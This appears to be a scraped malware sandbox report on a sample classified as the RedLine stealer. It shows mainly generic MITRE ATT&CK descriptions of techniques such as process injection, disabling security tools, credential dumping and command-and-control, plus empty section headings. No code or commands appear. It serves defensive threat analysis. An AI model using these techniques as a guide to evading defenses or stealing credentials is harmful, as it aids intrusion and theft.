Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report kS2dqbsDwD

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: RedLine

Yara Overview

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre